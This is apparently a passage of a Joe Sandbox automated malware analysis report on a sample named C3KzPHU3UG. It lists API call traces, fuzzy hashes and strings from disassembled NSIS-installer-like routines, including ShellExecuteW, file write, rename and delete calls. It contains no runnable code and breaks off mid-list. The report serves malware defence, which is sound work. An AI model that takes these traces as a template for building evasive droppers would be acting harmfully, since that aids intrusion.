                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: FileFindFirst
                                              • String ID:
                                              • API String ID: 1974802433-0
                                              • Opcode ID: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                                              • Instruction ID: 400e5e0b203cfa4d99e013a63ed7a258bcbaee981441f5d34274aa4bdee23deb
                                              • Opcode Fuzzy Hash: 2942623f6c0277285390027b9d18840a489366ce0a7cc68cdc812ca0f05454fe
                                              • Instruction Fuzzy Hash: 6AE065716042109BE710E778AD89AAF226CDF41328B100677E116F50D1E67889819B1D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                                              • Instruction ID: 195f9c0d2d2971c704648993b79f5dd0ea752a0e03b98457dcbfca0f5118a9d4
                                              • Opcode Fuzzy Hash: 3db9e2985b9a95f07b4948d92816868b6eb93f1de1133e87cfb4c0131ea940ae
                                              • Instruction Fuzzy Hash: D2E16D71D04214DFCF18CF58D880AADB7F1AF45305F1981ABE856AF286D738AA50CF55
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                                              • Instruction ID: 00c1500383e690738851ed547f8828f465c8dec40552374253bbad03b7333b94
                                              • Opcode Fuzzy Hash: 06c75ba6eb7b1da5beda44bb12a349235cc55abe98431d1e410fa8ae9787adfe
                                              • Instruction Fuzzy Hash: 59C15C72A012698FCF18DF68C9805ED7BA2FF89314B16812AEC56A7384D734EC55CF84
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404F81
                                              • ShowWindow.USER32(?), ref: 00404F9E
                                              • DestroyWindow.USER32 ref: 00404FB2
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00404FCE
                                              • GetDlgItem.USER32(?,?), ref: 00404FEF
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405003
                                              • IsWindowEnabled.USER32(00000000), ref: 0040500A
                                              • GetDlgItem.USER32(?,00000001), ref: 004050B9
                                              • GetDlgItem.USER32(?,00000002), ref: 004050C3
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 004050DD
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040512E
                                              • GetDlgItem.USER32(?,00000003), ref: 004051D4
                                              • ShowWindow.USER32(00000000,?), ref: 004051F6
                                              • EnableWindow.USER32(?,?), ref: 00405208
                                              • EnableWindow.USER32(?,?), ref: 00405223
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405239
                                              • EnableMenuItem.USER32(00000000), ref: 00405240
                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00405258
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040526B
                                              • lstrlenW.KERNEL32(0044FD98,?,0044FD98,004732A0), ref: 00405294
                                              • SetWindowTextW.USER32(?,0044FD98), ref: 004052A8
                                              • ShowWindow.USER32(?,0000000A), ref: 004053DC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID:
                                              • API String ID: 184305955-0
                                              • Opcode ID: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                                              • Instruction ID: 48c820c9c586f8d8a765c04f05b8e06de5329faa08805170889eeb6d15e0b63f
                                              • Opcode Fuzzy Hash: 7aaa3711757a90e2e8d2d5b12379ccc9e45fddc9e642e06a127254d179e313fb
                                              • Instruction Fuzzy Hash: 1DC19F71500A04EBDB206F61EE89E2B3AA8FB45746F00053EF645B11F1CB799881EF5E
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00403CD3
                                              • GetDlgItem.USER32(?,000003E8), ref: 00403CE7
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00403D04
                                              • GetSysColor.USER32(?), ref: 00403D15
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00403D23
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00403D31
                                              • lstrlenW.KERNEL32(?), ref: 00403D3C
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00403D49
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00403D58
                                                • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B48
                                                • Part of subcall function 00403B31: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00403C8A,?), ref: 00403B57
                                                • Part of subcall function 00403B31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00403C8A,?), ref: 00403B6B
                                              • GetDlgItem.USER32(?,0000040A), ref: 00403DB2
                                              • SendMessageW.USER32(00000000), ref: 00403DB9
                                              • GetDlgItem.USER32(?,000003E8), ref: 00403DE4
                                              • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 00403E27
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00403E35
                                              • SetCursor.USER32(00000000), ref: 00403E38
                                              • ShellExecuteW.SHELL32(0000070B,open,0046B220,00000000,00000000,00000001), ref: 00403E4D
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00403E59
                                              • SetCursor.USER32(00000000), ref: 00403E5C
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00403E8B
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00403E9D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                              • String ID: %AtlasTreasures%$N$open
                                              • API String ID: 3928313111-2198007348
                                              • Opcode ID: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                                              • Instruction ID: ed57efd37533f930562fe34da2b72c8113efd27b5b8a5cb1164b605c320215f3
                                              • Opcode Fuzzy Hash: eeec9a5106f0c5fb6c06cb270565f78b24ee1f1d5bc0a3e508a16aae0c4c8822
                                              • Instruction Fuzzy Hash: A87181B1900609BFDB109F24DD89A6A7F7CFB04306F00813AF605B62E1C7789A51CF99
                                              APIs
                                              • lstrcpyW.KERNEL32(00463E20,NUL), ref: 0040636B
                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,?,?,0040654E,00000000,00000000,00000001,00406721,?,00000000), ref: 0040638A
                                              • GetShortPathNameW.KERNEL32(00000000,00463E20,00000400), ref: 00406393
                                                • Part of subcall function 00405864: lstrlenA.KERNEL32(00406495,?,00000000,00000000,?,00000000,00406495,00000000,[Rename]), ref: 00405874
                                                • Part of subcall function 00405864: lstrlenA.KERNEL32(00000000,?,00000000,00406495,00000000,[Rename]), ref: 004058A6
                                              • GetShortPathNameW.KERNEL32(Ne@,00469478,00000400), ref: 004063B4
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00463E20,000000FF,00464620,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063DD
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00469478,000000FF,00464C70,00000400,00000000,00000000,?,00000000,?,?,?,0040654E,00000000,00000000), ref: 004063F5
                                              • wsprintfA.USER32 ref: 0040640F
                                              • GetFileSize.KERNEL32(00000000,00000000,00469478,C0000000,00000004,00469478,?), ref: 00406447
                                              • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406456
                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406472
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004064A2
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00465070,00000000,-0000000A,004089A0,00000000,[Rename]), ref: 004064F5
                                                • Part of subcall function 004058FE: GetFileAttributesW.KERNELBASE(00000003,0040315B,004E80D8,80000000,00000003,?,?,?,00000000,004035D7,?), ref: 00405902
                                                • Part of subcall function 004058FE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004035D7,?), ref: 00405924
                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406509
                                              • GlobalFree.KERNEL32(00000000), ref: 00406510
                                              • CloseHandle.KERNEL32(?), ref: 0040651A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                              • String ID: >F$%s=%s$NUL$Ne@$[Rename]$pLF
                                              • API String ID: 565278875-2487742289
                                              • Opcode ID: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                                              • Instruction ID: ec96de5c0a89ca25b54bc76a1f58c05e631165e395b03bcecce623a0c26120a0
                                              • Opcode Fuzzy Hash: b4dbeba100c443a2c99ce08ec389315a9b0dbc3ce33a9389b5f019bb092845f7
                                              • Instruction Fuzzy Hash: C2412A32105209BFC6202B61EE48E2F3E5CDF86758B16453EF546F22D1DE3D98158ABE
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                              • DeleteObject.GDI32(?), ref: 004010F6
                                              • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                              • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                              • SelectObject.GDI32(00000000,?), ref: 00401149
                                              • DrawTextW.USER32(00000000,004732A0,000000FF,00000010,00000820), ref: 0040115F
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                              • DeleteObject.GDI32(?), ref: 0040116E
                                              • EndPaint.USER32(?,?), ref: 00401177
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                                              • Instruction ID: 5d70bd818855421fa823bf0ed1b165e0401977292747d9ede3c4f118d7b178ba
                                              • Opcode Fuzzy Hash: 6ff7da4ded68621eb9ecef41b220d021edcb146cdc93fa7e0b1181698ae2407c
                                              • Instruction Fuzzy Hash: BB515A71400209AFCF058F95DE459AF7FB9EF44311F04802AF992AA1A0CB38DA55DFA4
                                              APIs
                                              • GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              • GetSystemDirectoryW.KERNEL32(%AtlasTreasures%,00002004), ref: 0040621D
                                                • Part of subcall function 00405AB8: lstrcpynW.KERNEL32(?,?,00002004,00403483,004732A0,NSIS Error), ref: 00405AC5
                                                • Part of subcall function 004060CA: SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040626C
                                                • Part of subcall function 004060CA: SHGetPathFromIDListW.SHELL32(?,%AtlasTreasures%), ref: 0040627A
                                                • Part of subcall function 004060CA: CoTaskMemFree.OLE32(?), ref: 00406285
                                              • GetWindowsDirectoryW.KERNEL32(%AtlasTreasures%,00002004), ref: 00406230
                                              • lstrcatW.KERNEL32(%AtlasTreasures%,\Microsoft\Internet Explorer\Quick Launch), ref: 004062AA
                                              • lstrlenW.KERNEL32(%AtlasTreasures%,00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040630C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrcpynlstrlen
                                              • String ID: %AtlasTreasures%$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 3935908587-642398599
                                              • Opcode ID: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                                              • Instruction ID: faf527bbbd80b2f6d96589bc921f5814a8c68153425bf04786751db3c9b8505d
                                              • Opcode Fuzzy Hash: d404f1267a91f84120ed82a5726344723f4104790e5192d29b3fdddb81e5045c
                                              • Instruction Fuzzy Hash: A2711531900215AADF20AF68CC4467E33B4EB55314F12817FE947BA2E1D73D89A2CB9D
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040396C
                                              • GetSysColor.USER32(00000000), ref: 00403988
                                              • SetTextColor.GDI32(?,00000000), ref: 00403994
                                              • SetBkMode.GDI32(?,?), ref: 004039A0
                                              • GetSysColor.USER32(?), ref: 004039B3
                                              • SetBkColor.GDI32(?,?), ref: 004039C3
                                              • DeleteObject.GDI32(?), ref: 004039DD
                                              • CreateBrushIndirect.GDI32(?), ref: 004039E7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                                              • Instruction ID: fd505c26376d0b004dab163c32b6598f7c3f39bfa23b8c101552dd0b32be6230
                                              • Opcode Fuzzy Hash: 6e8c2a3615f2505a185ac55974dadb6ac4ac18c0c35a8d3832bbfc0dda71d657
                                              • Instruction Fuzzy Hash: 931166B15007446BC7219F68DE08B5BBFFCAF05715F05892DF886E22A0D774DA48CB54
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402A83
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,00000000), ref: 00402AA0
                                              • GlobalFree.KERNEL32(?), ref: 00402AD7
                                              • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00402AEB
                                              • GlobalFree.KERNEL32(00000000), ref: 00402AF2
                                              • CloseHandle.KERNEL32(?), ref: 00402B09
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402B1C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                              • String ID:
                                              • API String ID: 3294113728-0
                                              • Opcode ID: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                                              • Instruction ID: 9e4a56611826f2756eb4244239c06745681650eb98283bcdfa384ecb69a0f049
                                              • Opcode Fuzzy Hash: 2a415ac0b65e7ed1e85d085157a57941f96e69fc1561960092c6122626d45b92
                                              • Instruction Fuzzy Hash: 13219832D00114BBCB216FA5DE49E9F7F79DF49724F10423AF925761E1CB7848119BA8
                                              APIs
                                              • lstrlenW.KERNEL32(00447D88,00424D76,74DF23A0,00000000), ref: 00404AAB
                                              • lstrlenW.KERNEL32(0040304D,00447D88,00424D76,74DF23A0,00000000), ref: 00404ABB
                                              • lstrcatW.KERNEL32(00447D88,0040304D), ref: 00404ACE
                                              • SetWindowTextW.USER32(00447D88,00447D88), ref: 00404AE0
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00404B06
                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00404B20
                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00404B2E
                                                • Part of subcall function 004060CA: GetVersion.KERNEL32(00447D88,?,00000000,00404AAA,00447D88,00000000,00424D76,74DF23A0,00000000), ref: 0040619B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                              • String ID:
                                              • API String ID: 2740478559-0
                                              • Opcode ID: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                                              • Instruction ID: 484fc1ca55a69b1daf8ef76b765ed66def062ae06368be70f68da4f473989c37
                                              • Opcode Fuzzy Hash: 141fa25f867edaa8b9051ab2f09e4248f19e9da238f05a8cd45e618e6a3e53c0
                                              • Instruction Fuzzy Hash: A221B3B1900518BADF119F65DC84E9EBFB9FF84314F10413AFA04B22A0C7788A80DF58
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0040436A
                                              • GetMessagePos.USER32 ref: 00404372
                                              • ScreenToClient.USER32(?,?), ref: 0040438A
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040439C
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004043C2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653449274.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_C3KzPHU3UG.jbxd
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              • API String ID: 41195575-1993550816
                                              • Opcode ID: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                                              • Instruction ID: 785f0416c38af9d8ad27fcbae1db7caa358ffe27c450e4d5cf04d3572e5fe4cd
                                              • Opcode Fuzzy Hash: 0fd0a508c23a1f4cc7d109850199a12f342c67c69df64cb0c481c89d05409d64
                                              • Instruction Fuzzy Hash: B0017171A4021DBAEB00DBA4DD85FEEBBBCAF55714F10012BFB50B61D0C7B49A418B65
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD2
                                              • MulDiv.KERNEL32(0000EE00,00000064,000DBE9C), ref: 00402DFD
                                              • wsprintfW.USER32 ref: 00402E0D
                                              • SetWindowTextW.USER32(?,?), ref: 00402E1D
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E2F
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E07
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1653283153.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1653258871.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653301262.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.1653332037.000000000041E000.00000004.00000001.01000000.00000003.sdmp
